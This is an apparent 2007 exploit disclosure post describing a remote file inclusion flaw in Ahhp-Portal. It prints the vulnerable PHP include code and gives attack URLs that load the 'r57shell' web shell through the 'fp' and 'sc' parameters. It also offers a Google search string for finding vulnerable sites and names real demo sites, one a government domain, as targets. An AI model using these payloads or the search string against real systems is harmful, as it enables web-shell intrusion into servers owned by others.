Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

netbingo v 2000 >> RFI

HTMLeditbox & 2.2 >> RFI

WordPress v2.1.3 >> remote file include~

HYIP Manager Pro Script  >> Remote file Include

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	25.04.2007
Subject:	Ahhp(php)-Portal Remote File Inclusion

Ahhp-Portal Remote File Inclusion


SÝTE:www.ahhope.org

Demo:http://xinan.ahtcm.edu.cn
Demo2http://www.hfspaq.gov.cn


Vul Code:

                       <?
if ($sc=='')
include($fp.".php");
else
include($sc."/".$fp.".php");
?>


------------------------------------------------

example:

http://site/page.php?fp=r57shell?
http://site/page.php?sc=r57shell?


////////////////////////////////////////////////////

Credit : CodeXpLoder'tq

mail   : codexploder[at]hotmail[dot]com

site   : expw0rm.com

###############################################

Google :

"page.php?fp"

// Exploit Worm www.expw0rm.com